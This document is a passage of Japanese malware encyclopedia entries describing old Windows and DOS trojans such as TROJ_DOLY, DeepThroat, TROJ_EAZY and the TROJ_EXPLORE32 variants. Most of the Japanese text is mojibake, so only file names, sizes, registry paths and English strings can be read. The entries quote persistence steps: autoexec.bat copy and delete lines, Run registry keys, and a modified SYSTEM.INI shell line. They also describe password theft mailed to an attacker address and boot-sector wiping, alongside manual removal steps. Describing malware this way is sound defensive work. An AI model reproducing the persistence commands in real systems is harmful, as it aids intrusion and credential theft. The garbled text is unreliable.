¾Ü¡¡¡¡ºÙ:-¡¡¤³¤Î¥×¥í¥°¥é¥à¤Ï¥È¥í¥¤¤ÎÌÚÇÏ·¿Ç˲õ¥×¥í¥°
¥é¥à¤Ç¤¢¤êŽ¤Â¾¤Î¥Õ¥¡¥¤¥ë¤ä¥·¥¹¥Æ¥à¤Ë´¶À÷¤¹¤ë¤³¤È¤Ï¤Ê¤¤ Ž¡ -¡¡¥Õ¥¡¥¤¥ë¤ò¼Â¹Ô¤¹¤ë¤Èޤ¥­¡¼¤ò²¡¤»¤È¤¤¤¦¥×¥í¥ó¥×¥È¤¬ ɽ¼¨¤µ¤ìޤ²¡¤¹¤Èޤ±ß·Á¤Î³¨¤¬¥¹¥¯¥í¡¼¥ë¤·¤Æ¤¤¤¯Ž¡¤½¤Î¸åޤ ¾¤Î¥­¡¼¤ò²¡¤¹¤Èޤ²¼¤Î¤è¤¦¤Êµ¶¤Î¥¨¥é¡¼¥á¥Ã¥»¡¼¥¸¤¬É½¼¨ ¤µ¤ì¤ëŽ¡
START UP ERROR: Can not find vital data!
Attempting to safe close down (This may take several minuets ......) 25%..................>
È÷¡¡¡¡¹Í:¥ª¥ê¥¸¥Ê¥ë¥Õ¥¡¥¤¥ë̾:
UDPSEX.EXEޤSET101.EXEޤ WINOOM.EXEޤFREEPORN.EXE

TROJ_DOLY


̾¡¡¡¡¾Î:TROJ_DOLY

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿¡¢PE·¿

ÂС¡¡¡¾Ý:Windows3.1°Ê¾å

¥¦¥¤¥ë¥¹¥µ¥¤¥º:267,264¥Ð¥¤¥È

ȯ¾ÍÃÏ:¥¢¥á¥ê¥«¹ç½°¹ñ

¾Ü¡¡¡¡ºÙ:¼Â¹Ô¤µ¤ì¤¿¥¦¥¤¥ë¥¹¤Ï¡¢°Ê²¼¤Î¥³¥Þ¥ó¥É¤ò
autoexec.bat¤ËÄɲä·¡¢autoexec.bat¤¬µ¯Æ°¤¹¤ë¤È¡¢¥¦¥¤ ¥ë¥¹¤âΩ¤Á¤¢¤¬¤ë¤è¤¦¤Ë¤¹¤ë¡£
@echo off copy c:\sys.lon c\windows\StartMenu\
Programs\StartUp\MStesk.exe
del c:\win.reg
cls ¤³¤ì¤Ë¤è¤ê¡¢¥¹¥¿¡¼¥È¥¢¥Ã¥×¡¦¥Õ¥©¥ë¥À¤ËMstesk.exe¤È¤¤ ¤¦¥×¥í¥°¥é¥à¡¦¥Õ¥¡¥¤¥ë¤¬ºîÀ®¤µ¤ì¡¢Windows¤Îµ¯Æ°»þ¤Ë¡¢ ¤³¤Î¥×¥í¥°¥é¥à¤¬¥á¥â¥ê¡¼¤Ë¥í¡¼¥É¤µ¤ì¤ë¤è¤¦¤Ë¤Ê¤ë¡£¤Ä
¤Å¤¤¤Æ¡¢WIN.INI¤Ëc:\windows\system\MStesk.exe¤È¤¤¤¦Ê¸
»úÎ󤬽ñ¤­¤³¤Þ¤ì¡¢¥³¥ó¥Ô¥å¡¼¥¿Ž¥¥·¥¹¥Æ¥à¤¬ºÆµ¯Æ°¤Ç¤­¤Ê ¤¯¤Ê¤ë¡£
È÷¡¡¡¡¹Í:TROJ_DOLY.Setup¥¦¥¤¥ë¥¹¤ò¼Â¹Ô¤¹¤ë¤È¤³¤Î¥×¥í
¥°¥é¥à¤¬¥¤¥ó¥¹¥È¡¼¥ë¤µ¤ì¤ë

TROJ_DOLY.SETUP


̾¡¡¡¡¾Î:TROJ_DOLY.SETUP

ÊÌ¡¡¡¡Ì¾:TROJ_DOLY

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

¥¦¥¤¥ë¥¹¥µ¥¤¥º:2ޤ049ޤ807 bytes

ȯ¾ÍÃÏ:USA

¾Ü¡¡¡¡ºÙ:-¡¡¤³¤ì¤Ï¥Í¥Ã¥È¥ï¡¼¥¯¤ò²ð¤·¤ÆÂ¾¿Í¤Î¥³¥ó¥Ô¥å
¡¼¥¿¡¼¤ò¥³¥ó¥È¥í¡¼¥ë¤¹¤ë¤¿¤á¤Î¥È¥í¥¤¤ÎÌÚÇÏ·¿°­¼Á¥×¥í ¥°¥é¥à¤Ç¤¢¤ëŽ¡´¶À÷¤Ï¤·¤Ê¤¤Ž¡ - TROJ_DOLY.setup¤ÏޤTROJ_DOLY¤È¤¤¤¦¥¦¥¤¥ë¥¹¤òŽ¢µ¾À·¼ÔŽ£ ¤Ç¤¢¤ë¥æ¡¼¥¶¤Î¥³¥ó¥Ô¥å¡¼¥¿¡¼¤Ë¥¤¥ó¥¹¥È¡¼¥ë¤¹¤ë¤¿¤á¤Î ¥»¥Ã¥È¥¢¥Ã¥×¥×¥í¥°¥é¥à¤Ç¤¢¤ëŽ¡ -¡¡¤Þ¤ºŽ¤³°Éô¤«¤é¤ÎÉÔÀµ¿¯Æþ¤ò¿Þ¤ë¥Ï¥Ã¥«¡¼¤Ï¡¢¤³¤ÎTROJ_ DOLY.setup¥×¥í¥°¥é¥à¤òÁ÷¤ê¤Ä¤±¤ëŽ¡¥æ¡¼¥¶¡¼¤¬¤¦¤Ã¤«¤ê¤³ ¤Î¥Õ¥¡¥¤¥ë¤ò¼Â¹Ô¤·¤Æ¤·¤Þ¤¦¤Èޤ¤½¤Î¥³¥ó¥Ô¥å¡¼¥¿¤Ë MStesk.EXE ¤È¤¤¤¦Ì¾Á°¤Î¥Õ¥¡¥¤¥ë¤¬¿·¤¿¤ËºîÀ®¤µ¤ì¤ëŽ¡¤³ ¤ì¤¬Ž¤TROJ_DOLY¥¦¥¤¥ë¥¹ËÜÂΤǤ¢¤ëŽ¡ -¡¡TROJ_DOLY¤¬Ž¢µ¾À·¼ÔŽ£¤Î¥³¥ó¥Ô¥å¡¼¥¿¡¼¤Ë¥¤¥ó¥¹¥È¡¼¥ë ¤µ¤ì¤ë¤Èޤ¥Ï¥Ã¥«¡¼¤¬¤½¤Î¥Þ¥·¥ó¤Ë¥¤¥ó¥¿¡¼¥Í¥Ã¥È·Ðͳ¤Ç¥¢ ¥¯¥»¥¹¤¹¤ë¤³¤È¤¬²Äǽ¤Ë¤Ê¤ëŽ¡¤³¤Î¥×¥í¥°¥é¥à¤Ï¥Þ¥·¥ó¤òÁà ºî¤¹¤ë42¤ÎÌ¿Îá¤ò»ý¤Ã¤Æ¤¤¤ëŽ¡

TROJ_DTV2


̾¡¡¡¡¾Î:TROJ_DTV2

ÊÌ¡¡¡¡Ì¾:WIN32.DEEPTHROAT

¥¦¥¤¥ë¥¹¥µ¥¤¥º:414,657 bytes (¥¯¥é¥¤¥¢¥ó¥È), 312,180
bytes (¥µ¡¼¥Ð¡¼)
¾Ü¡¡¡¡ºÙ:Windows95/98¤Çưºî¤¹¤ë¥È¥í¥¤¤ÎÌÚÇÏ·¿¥¦¥¤¥ë
¥¹¡£Back Orifice¥¦¥¤¥ë¥¹¤È»÷¤¿Æ¯¤­¤ò¤¹¤ë±ó³ÖÀ©¸æ¥Ä ¡¼¥ë¤Ç¡¢¥µ¡¼¥Ð¡¼Ž¥¥â¥¸¥å¡¼¥ë¤È¥¯¥é¥¤¥¢¥ó¥ÈŽ¥¥â¥¸¥å¡¼ ¥ë¡¢£²¤Ä¤Î¥×¥í¥°¥é¥à¤«¤é¤Ê¤ë¡£¥¤¥ó¥¿¡¼¥Í¥Ã¥È·Ðͳ¤Ç¥Ï ¥Ã¥«¡¼¤Ë¥·¥¹¥Æ¥à´ÉÍý¼Ô¸¢¸Â¤È¤¤¤¦À©¸æ¸¢¤òÍ¿¤¨¡¢¥Í¥Ã¥È ¥ï¡¼¥¯Ž¥¥»¥­¥å¥ê¥Æ¥£¤¬´í¸±¤Ë¤µ¤é¤µ¤ì¤ë¡£ ¥æ¡¼¥¶¡¼¤¬¤¢¤ä¤Þ¤Ã¤Æ¥µ¡¼¥Ð¡¼Ž¥¥â¥¸¥å¡¼¥ë¤ò¼Â¹Ô¤¹¤ë¤È¡¢ systemio.exe¤È¤¤¤¦¥Õ¥¡¥¤¥ë¤¬Windows\system¥Ç¥£¥ì¥¯¥È ¥ê¤Ë¥³¥Ô¡¼¤µ¤ì¤ë¡£ ¥µ¡¼¥Ð¡¼Ž¥¥â¥¸¥å¡¼¥ë¤¬¼Â¹Ô¤µ¤ì¤Æ¤¤¤ë¤È¡¢¥Ï¥Ã¥«¡¼¤Ï¥¯¥é ¥¤¥¢¥ó¥ÈŽ¥¥â¥¸¥å¡¼¥ë¤ò»È¤Ã¤Æ¡¢¥æ¡¼¥¶¡¼¤ÎPC¤Ë¥¢¥¯¥»¥¹ ¤·¡¢¥Õ¥¡¥¤¥ë¥·¥¹¥Æ¥à¤Î²þ¤¶¤ó¡¢¥Ç¥£¥¹¥×¥ì¥¤¤Îɽ¼¨¡¢¥Þ ¥¦¥¹¥«¡¼¥½¥ë¤ÎÁàºî¤Ê¤É¡¢»×¤¤¤É¤ª¤ê¤ËPC¤òÀ©¸æ¤Ç¤­¤ë¡£

TROJ_DUNS.PWS


̾¡¡¡¡¾Î:TROJ_DUNS.PWS

ÊÌ¡¡¡¡Ì¾:DUNSPWS.Y, PWSTEAL.TROJAN

ʬ¡¡¡¡Îà:¥È¥í¥¤¤Î ÌÚÇÏ·¿

¥¦¥¤¥ë¥¹¥µ¥¤¥º:266,752 bytes

¾Ü¡¡¡¡ºÙ:¤³¤ì¤Ï¥È¥í¥¤¤ÎÌÚÇÏ·¿ÉÔÀµ¥×¥í¥°¥é¥à¤Ç¤¢¤ë¡£
¾¤Ë´¶À÷¤¹¤ë¤³¤È¤Ï¤Ê¤¤¡£ ¤³¤Î¥×¥í¥°¥é¥à¤ò¼Â¹Ô¤¹¤ë¤È¡¢Windows¥Ç¥£¥ì¥¯¥È¥ê¤Ë SYSTRAY.EXE¤È¤¤¤¦Ì¾¾Î¤Ç¼«Ê¬¼«¿È¤ÎÊ£À½¤òºî¤ë¡£ ¤Þ¤¿¡¢°Ê²¼¤Î¥ì¥¸¥¹¥È¥ê¥¨¥ó¥È¥ê¤ËÃͤòÄɲä·¡¢¥·¥¹¥Æ¥à ¤Îµ¯Æ°»þ¤Ëɬ¤º¼Â¹Ô¤µ¤ì¤ë¤è¤¦¤ËÀßÄꤹ¤ë¡£ HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\
CURRENTVERSION\RUN ÃÍ:SytemTray = ¡È C:\Windows\
Systray.exe¡É ¼¡¤Ë¡¢PWL¥Õ¥¡¥¤¥ë¤òõ¤¹¡£¤³¤Î¥Õ¥¡¥¤¥ë¤Ë¤Ï¥Ñ¥¹¥ï¡¼¥É¤¬ °Å¹æ²½¤µ¤ì¤ÆÊݸ¤µ¤ì¤Æ¤¤¤ë¡£ ¤³¤Î¥¦¥¤¥ë¥¹¤ÏSMTP¤òÍøÍѤ·¡¢¥Ñ¥¹¥ï¡¼¥É¤ò¥¦¥¤¥ë¥¹¤Îºî ¼Ô¤ËÁ÷¤ë¡£
È÷¡¡¡¡¹Í:¤Á¤Ê¤ß¤Ë¡¢Windows ¥·¥¹¥Æ¥à¤ËWindows\system\
¥Ç¥£¥ì¥¯¥È¥ê¤Ëɸ½à¤Ç¡ÉSystray.exe¡É¤¬Â¸ºß¤¹¤ë¤¬¡¢¤³ ¤Î¥Õ¥¡¥¤¥ë¤¬¥È¥í¥¤¤ÎÌÚÇÏTROJ_DUNS.PWS¤Ë¤è¤Ã¤Æ²þÊѤµ¤ì ¤ë¤³¤È¤Ï¤Ê¤¤¡£

TROJ_EAZY


̾¡¡¡¡¾Î:TROJ_EAZY

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:Win3.1 Win95

¥¦¥¤¥ë¥¹¥µ¥¤¥º:46,081 bytes

¾Ü¡¡¡¡ºÙ:TROJ_EAZY¤ÏAOL¤Î¥Ñ¥¹¥ï¡¼¥É¤òÅð¤à¥È¥í¥¤¤ÎÌÚ
ÇÏ·¿ÉÔÀµ¥×¥í¥°¥é¥à¤Ç¤¹¡£ ¼Â¹Ô¤¹¤ë¤È¡¢WINDOWS\SYSTEM¥Ç¥£¥ì¥¯¥È¥ê¤Ë¡¢EXPLORE.EXE ¤È¤·¤Æ¼«Ê¬¼«¿È¤ÎÊ£À½¤òºîÀ®¤·¤Þ¤¹¡£ ¤µ¤é¤Ë¡¢SYSTEM.INI¤Î[boot]¥»¥¯¥·¥ç¥ó¤ò²¼µ­¤Î¤è¤¦¤ËÊÑ ¹¹¤·¡¢¥·¥¹¥Æ¥à¤Îµ¯Æ°»þ¤ËTROJ_EAZY¤¬É¬¤º¼Â¹Ô¤µ¤ì¤ë¤è¤¦ ¤ËÀßÄꤷ¤Þ¤¹¡£ *Êѹ¹Á°(ɸ½à¤ÎSYSTEM.INI) Shell = EXPLORER.EXE *Êѹ¹¸å
Shell = EXPLORER.EXE C:\WINDOWS\SYSTEM\EXPLORE.EXE
¤½¤·¤Æ¡¢SYSTEM.INI¤òÆÉ¤ß¼è¤êÀìÍѤˤ·¤Æ¤·¤Þ¤¤¤Þ¤¹¡£ »³² ¤³¤Î¥È¥í¥¤¤ÎÌÚÇϤϡ¢¥æ¡¼¥¶¡¼¤ÎAOL¤ËÀܳ¤¹¤ë¤Î¤ò´Æ»ë ¤·¡¢¤½¤Î¥Ñ¥¹¥ï¡¼¥É¤òD01J@YAHOO.COM.¤ËÂФ·¤ÆE-mail¤ÇÁ÷ ¿®¤·¤è¤¦¤È¤·¤Þ¤¹¡£
È÷¡¡¡¡¹Í:**¼êưºï½ü¼ê½ç
­¡ SYSTEM.INI¤Î¥×¥í¥Ñ¥Æ¥£¤«¤éÆÉ¤ß¼è¤ê°À­¤ò²ò½ü¤¹ ¤ë¡£ ­¢ SYSTEM.INI¤ò¥¨¥Ç¥£¥¿¤Ç³«¤¯ ­£ [boot]¥»¥¯¥·¥ç¥ó¤Ç°Ê²¼¤Î¤è¤¦¤Ë½¤Àµ¤¹¤ë¡£ *½¤ÀµÁ°
Shell = EXPLORER.EXE C:\WINDOWS\SYSTEM\EXPLORE.EXE
*½¤Àµ¸å(ɸ½à¤ÎSYSTEM.INI) Shell = EXPLORER.EXE ­¤ SYSTEM.INI¤òÊݸ¤¹¤ë¡£ ­¥ ¥Þ¥·¥ó¤òºÆµ¯Æ°¤¹¤ë¡£ ­¦ EXPLORE.EXE¤òºï½ü¤¹¤ë¡£

TROJ_ERASE_PART


̾¡¡¡¡¾Î:TROJ_ERASE_PART

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:DOS(COM)

¥¦¥¤¥ë¥¹¥µ¥¤¥º:80 bytes

¾Ü¡¡¡¡ºÙ:¤³¤ì¤Ï¥È¥í¥¤¤ÎÌÚÇÏ·¿°­¼Á¥×¥í¥°¥é¥à¤Ç¤¢¤ë¡£
´¶À÷¤Ï¤·¤Ê¤¤¡£ ¤³¤Î¥×¥í¥°¥é¥à¤ò¼Â¹Ô¤¹¤ë¤È¡¢¥Ï¡¼¥É¥Ç¥£¥¹¥¯¤ÎHead 0 Track 0 Sector 1 ¤ò¡ÈCD AB¡É¤Ç¾å½ñ¤­¤·¤Æ¤·¤Þ¤¦¡£¤³¤Î ¤¿¤áFDISK¥æ¡¼¥Æ¥£¥ê¥Æ¥£¤ò»È¤Ã¤ÆºÆ¥Õ¥©¡¼¥Þ¥Ã¥È¤·¤Ê¤¤¸Â ¤ê¡¢¥Ç¥£¥¹¥¯¤ò»ÈÍѤ¹¤ë¤³¤È¤¬¤Ç¤­¤Ê¤¯¤Ê¤Ã¤Æ¤·¤Þ¤¦¡£

TROJ_ERKLE


̾¡¡¡¡¾Î:TROJ_ERKLE

¸À¡¡¡¡¸ì:English

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:DOS

¾Ü¡¡¡¡ºÙ:¥¦¥¤¥ë¥¹¥Õ¥¡¥¤¥ë¤ò¼Â¹Ô¤·¤¿¤é¡¢¥æ¡¼¥¶¤Ë1.
44MB¤Î¥Ç¥£¥¹¥¯¤ò£Â¥É¥é¥¤¥Ö¤ËÆþ¤ì¤ë¤è¤¦¤ËÍ׵᤹¤ë¥á¥Ã ¥»¡¼¥¸¤¬É½¼¨¤µ¤ì¤ë¡£¥Ç¥£¥¹¥¯¤òÆþ¤ì¤ë¤È¡¢¤½¤Î¥Ç¥£¥¹¥¯ ¤Î¥Ö¡¼¥È¥»¥¯¥¿¤òÇ˲õ¤·¡¢¼¡¤Î¥á¥Ã¥»¡¼¥¸¤òɽ¼¨¤¹¤ë¡£ "Hehe....SNORT! OOPS...Did I do that?"
È÷¡¡¡¡¹Í:Ç˲õ¤µ¤ì¤¿¥Ç¥£¥¹¥¯¤Ï»ÈÍÑÉÔǽ¤Ë¤Ê¤ê¡¢ºÆ¥Õ¥©
¡¼¥Þ¥Ã¥È¤¬É¬Íפˤʤ롣

TROJ_EXCRETION


̾¡¡¡¡¾Î:TROJ_EXCRETION

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:¤Ê¤·

¥¦¥¤¥ë¥¹¥µ¥¤¥º:112ޤ654¥Ð¥¤¥È

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:- ¥È¥í¥¤¤ÎÌÚÇÏ·¿¥¦¥¤¥ë¥¹¤Ç¤¢¤ê¡¢Â¾¤Î¥Õ¥¡¥¤
¥ë¤ä¥·¥¹¥Æ¥à¤Ë´¶À÷¤¹¤ë¤³¤È¤Ï¤Ê¤¤¡£ »³² ¡¡´¶À÷¥Õ¥¡¥¤¥ë¤¬¼Â¹Ô¤µ¤ì¤ë¤È¡¢¥Ï¡¼¥É¥Ç¥£¥¹¥¯¤Î¥Õ¥© ¡¼¥Þ¥Ã¥È¤ò¤¦¤Ê¤¬¤¹¡¢°Ê²¼¤Î·Ù¹ð¥á¥Ã¥»¡¼¥¸¤òɽ¼¨¤¹¤ë¡£ ¤·¤«¤·¡¢¼ÂºÝ¤Ë¤Ï¡¢Ç˲õ¥³¡¼¥É¤Î½ñ¤­¹þ¤ß¤Ë¼ºÇÔ¤¹¤ë¤¿ ¤á¡¢Â»³²¤Ï¤Ê¤¤¡£ ¡Ê·Ù¹ð¥á¥Ã¥»¡¼¥¸¡Ë ¡ÈHeyޤ I bet you are one of the people who ran VIRUS. EXE in excretion 1 And nowyou do it againoch Dumbޤ Dumbޤ you are lameޤ lameޤ lame. You are not worthy tohave the right of reading excretion. You should just format your hard drive.¡É

TROJ_EXPLORE32.A


̾¡¡¡¡¾Î:TROJ_EXPLORE32.A

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:WIN32¡Ê.EXE¡Ë

¥¦¥¤¥ë¥¹¥µ¥¤¥º:620,544¥Ð¥¤¥È

ȯ¾ÍÃÏ:¥¤¥¿¥ê¥¢(?)

¾Ü¡¡¡¡ºÙ:TROJ_EXPLORE32¥¦¥¤¥ë¥¹¤ÎÊѼï¤À¤¬¡¤¤È¤¯¤ËÂç
¤­¤ÊÊѲ½¤Ïǧ¤á¤é¤ì¤Ê¤¤¡£SHEEP.EXE¤È¤¤¤¦¥Õ¥¡¥¤¥ë̾¤ÇÇÛ ÉÛ¤µ¤ì¤ë¤³¤È¤¬Â¿¤¤¤¬¡¤¥Õ¥¡¥¤¥ë̾¤Ï¼«Í³¤Ë½ñ¤­¤«¤¨¤ë¤³ ¤È¤¬¤Ç¤­¤ë¡£Windows¥¢¥¤¥³¥ó¤¬É½¼¨¤µ¤ì¤ë¤¿¤á¡¢Ä̾ï¤Î Windows¥×¥í¥°¥é¥à¤Ç¤¢¤ë¤È´ª°ã¤¤¤·¤ä¤¹¤¤¡£¥¦¥¤¥ë¥¹¤ò´Þ ¤à¥Õ¥¡¥¤¥ë¤ò¼Â¹Ô¤·¤Æ¤â¡¤É½Ì̾å¤Ï²¿¤âµ¯¤³¤é¤Ê¤¤¡£¤·¤« ¤·¡¤Windows¥Õ¥©¥ë¥À¤Î¥ë¡¼¥È¥Ç¥£¥ì¥¯¥È¥ê¤ò¸«¤ë¤È¡¤¿·¤¿ ¤Ë¡¤Expl32.exe¤È¤¤¤¦¥Õ¥¡¥¤¥ë¤¬ºîÀ®¤µ¤ì¤Æ¤¤¤ë¤Î¤¬Ê¬¤« ¤ë¡£¤³¤Î¥Õ¥¡¥¤¥ë¤Ï¡¤¥¦¥¤¥ë¥¹¥³¡¼¥É¤Î¥³¥Ô¡¼¤Ç¤¢¤ë¡£¤Þ ¤¿¡¤RegEdit.exe¤Ê¤É¤Î¥ì¥¸¥¹¥È¥ê¡¦¥¨¥Ç¥£¥¿¤ò»È¤Ã¤Æ¡¢\ HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\ CurrentVersion\Run¤È¤¤¤¦¥­¡¼¤Î¥ì¥¸¥¹¥È¥êÀßÄê¤ò¸«¤ë¤È ¡¤ Explorer32¤È¤¤¤¦Ì¾Á°¤Î¿·¤¿¤Ê¥µ¥×¡¦¥­¡¼¤¬ºîÀ®¤µ¤ì¤Æ¤ª
¤ê¡È:\WINDOWS\Expl32.exe¡É¤È¤¤¤¦Ãͤ¬ÂåÆþ¤µ¤ì¤Æ
¤¤¤ë¤³¤È¤¬³Îǧ¤Ç¤­¤ë¡£ Expl32.exe¤Ï¡¢À©¸Â¤ò¼õ¤±¤º¤Ë¡¢WSOCK32.DLL¤ò¸Æ¤Ó½Ð¤·¡¢ ¥Í¥Ã¥È¥ï¡¼¥¯·Ðͳ¤Ç¥¯¥é¥¤¥¢¥ó¥ÈŽ¥¥â¥¸¥å¡¼¥ë¤Ë¥¢¥¯¥»¥¹¤Ç ¤­¤ë¡£¤Þ¤¿¡¢WINMM.DLL¤ò»²¾È¤·¤Æ¡¢¥¯¥é¥¤¥¢¥ó¥È¦¤«¤é´¶ À÷¥³¥ó¥Ô¥å¡¼¥¿¤Î¥Þ¥ë¥Á¥á¥Ç¥£¥¢¡¦¥¢¥×¥ê¥±¡¼¥·¥ç¥ó¤òÁà ºî¤¹¤ë¤Ç¤­¤ë¡£ ´¶À÷¤·¤¿¥Þ¥·¥ó¤¬¥Í¥Ã¥È¥ï¡¼¥¯Àܳ¤ËMS¥×¥í¥­¥·¤òÍøÍѤ· ¤Æ¤¤¤ë¤È¡¢¥µ¡¼¥ÐŽ¥¥â¥¸¥å¡¼¥ë¤Ï¥Í¥Ã¥È¥ï¡¼¥¯¤ÎÀܳ¹¹¿·¥ì ¡¼¥È¤ÎÃͤò£²¤«¤é850¤ËÊѹ¹¤¹¤ë¡£ ¥µ¡¼¥ÐŽ¥¥â¥¸¥å¡¼¥ë¤Ï¥¯¥é¥¤¥¢¥ó¥È¤ÎIP¥¢¥É¥ì¥¹¤ò¥À¥¦¥ó¥í ¡¼¥É¤·¡¢¤½¤ÎIP¥¢¥É¥ì¥¹¤¬¥¢¥¯¥Æ¥£¥Ö¤Ç¤¢¤ì¤Ð¡¢¤½¤ì¤òÊÑ ¹¹¤¹¤ë¡£

TROJ_EXPLORE32.C


̾¡¡¡¡¾Î:TROJ_EXPLORE32.C

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:Win32

¥¦¥¤¥ë¥¹¥µ¥¤¥º:300,248¥Ð¥¤¥È

¾Ü¡¡¡¡ºÙ:TROJ_EXPLORE32¥¦¥¤¥ë¥¹¤Î¥¯¥é¥¤¥¢¥ó¥È¡¦¥â¥¸
¥å¡¼¥ë¡£´¶À÷¥³¥ó¥Ô¥å¡¼¥¿¤Ë¿¯Æþ¤·¤¿¥µ¡¼¥ÐŽ¥¥â¥¸¥å¡¼¥ë¤ò À©¸æ¤¹¤ë¡£ ÆÃħ
FTP:¥µ¡¼¥Ð¤¬¥æ¡¼¥¶¤ÎIP¥¢¥É¥ì¥¹¤òÆÉ¤ß¼è¤ê¡¢¥Ï¥Ã¥«¡¼
¡Ê¥¯¥é¥¤¥¢¥ó¥È¡Ë¤Ë¾ðÊó¤òÁ÷¤ë¡£
¸¡º÷:°ìÄê¤Î´Ö³Ö¤Ç¡¢¥µ¥Ö¥Í¥Ã¥È¤ò¤­¤ï¤á¤Æ¸úΨŪ¤Ë¸¡º÷
¤¹¤ë¡£ ¡¦¼¡¤Î¥æ¡¼¥¶¾ðÊó¤òÅð¤à¤³¤È¤¬¤Ç¤­¤ë¡£ ¡¡¡¡¥æ¡¼¥¶Ì¾¡¢¹ñ¡¢ÆüÉÕ¡¢OS¤äCPU¤Î¼ïÎà¡¢ ¡¡¡¡¥Ñ¥¹¥ï¡¼¥É¡¢ÆþÎÏ¥­¡¼ ¡¦ ´¶À÷¤·¤¿¥³¥ó¥Ô¥å¡¼¥¿¤Ë¥¯¥é¥¤¥¢¥ó¥È¤«¤é¥á¥Ã¥»¡¼¥¸¤ò Á÷¤ë¤³¤È¤¬¤Ç¤­¤ë¡£ ¡¦NetBus¥¦¥¤¥ë¥¹Æ±ÍÍ¡¢¼¡¤Îµ¡Ç½¤òÀ©¸æ¤Ç¤­¤ë¡£ ¡¡¡¡CD-ROM¤Î³«ÊÄ ¡¡¡¡¥¿¥¹¥¯¥Ð¡¼¤òɽ¼¨¤¹¤ë¡¿±£¤¹ ¡¡¡¡¥­¡¼ÆþÎϤò̵¸ú¤Ë¤¹¤ë ¡¡¡¡¥Þ¥¦¥¹¥­¡¼¤Î¥¹¥ï¥Ã¥× ¡¡¡¡¥«¡¼¥½¥ë¤Î°Üư ¡¡¡¡¥³¥ó¥Ô¥å¡¼¥¿¤Î¥·¥ã¥Ã¥È¥À¥¦¥ó¡¢ºÆµ¯Æ°¡¢¥í¥°¥ª¥Õ ¡¦ ¥×¥í¥»¥¹¤ÎÃæ»ß¡¿±£Êá¿É½¼¨¡¿¥ê¥Í¡¼¥à¤¬¤Ç¤­¤ë¡£ ¡¦ ´¶À÷¤·¤¿¥³¥ó¥Ô¥å¡¼¥¿¤«¤é¥Õ¥¡¥¤¥ë¤ò¥¢¥Ã¥×¥í¡¼¥É¡¿¥À ¥¦¥ó¥í¡¼¥É¤Ç¤­¤ë¡£ ¡¦ ´¶À÷¥³¥ó¥Ô¥å¡¼¥¿¤Î¥Ç¥£¥¹¥×¥ì¥¤¤Ëɽ¼¨¤µ¤ì¤Æ¤¤¤ë²èÌÌ ¤½¤Î¤â¤Î¤ò¥¯¥é¥¤¥¢¥ó¥È¤ËÁ÷¤ë¤³¤È¤â¤Ç¤­¤ë¡£

TROJ_EXPLORE32.D


̾¡¡¡¡¾Î:TROJ_EXPLORE32.D

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:Win95/98/NT

¥¦¥¤¥ë¥¹¥µ¥¤¥º:236¥­¥í¥Ð¥¤¥È

¾Ü¡¡¡¡ºÙ:Temp#01.jpg¡¢Temp$01.Exe ¡¢Temp$1.Exe¤È¤¤¤¦
£³¤Ä¤Î¥Õ¥¡¥¤¥ë¤ò¡¢Windows¤Î¥·¥¹¥Æ¥à¡¦¥Ç¥£¥ì¥¯¥È¥ê¤Ë¥³ ¥Ô¡¼¤¹¤ë¡££²¤Ä¤ÎExe¥Õ¥¡¥¤¥ë¤ÏTROJ_EXPLORE32.S¤Ç¤¢¤ê¡¢ ¤â¤¦°ì¤Ä¤ÎJpg¥Õ¥¡¥¤¥ë¤Ï¡¢myphoto.exe¤ò¼Â¹Ô¤¹¤ë¤Èɽ¼¨ ¤µ¤ì¤ë¡¢¾¯½÷¤Î¼Ì¿¿¤Ç¤¢¤ë¡£

TROJ_EXPLORE32.S


̾¡¡¡¡¾Î:TROJ_EXPLORE32.S

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:Win32

¥¦¥¤¥ë¥¹¥µ¥¤¥º:241,397¥Ð¥¤¥È

ȯ¾ÍÃÏ:¥¤¥¿¥ê¥¢¡Ê¡©¡Ë

¾Ü¡¡¡¡ºÙ:BackOrifice¥¦¥¤¥ë¥¹¤È»÷¤¿¥Ï¥Ã¥«¡¼Íѥġ¼¥ë¤Ç
¤¢¤ê¡¢´¶À÷¤·¤¿¥³¥ó¥Ô¥å¡¼¥¿¤«¤é¾ðÊó¤òÅð¤ß½Ð¤·¡¢³°Éô¤« ¤é¤Î±ó³ÖÁàºî¤ò²Äǽ¤Ë¤¹¤ë¡£ Server.exe¤È¤¤¤¦¥×¥í¥°¥é¥à̾¤Ç¤¢¤ë¤³¤È¤¬Â¿¤¤¤¬¡¢Ç¤°Õ ¤Ë̾Á°¤òÊѹ¹¤Ç¤­¤ë¡£Windows¥¢¥¤¥³¥ó¤ò¤â¤Ä¤¿¤á¡¢Ä̾ï¤Î ¥×¥í¥°¥é¥à¤È´ª°ã¤¤¤·¤¹¤¯¡¢¼Â¹Ô¤·¤Æ¤â¡¢¥¦¥¤¥ë¥¹¤À¤È¤Ï µ¤¤Å¤­¤Ë¤¯¤¤¡£ ¼Â¹Ô¤µ¤ì¤¿¥¦¥¤¥ë¥¹¤Ï¡¢Windows¥Õ¥©¥ë¥À¤Î¥ë¡¼¥È¥Ç¥£¥ì¥¯ ¥È¥ê¤Ë¡¢Expl32.exe¤È¤¤¤¦¥¦¥¤¥ë¥¹¤Î¥³¥Ô¡¼¤òºîÀ®¤¹¤ë¡£ 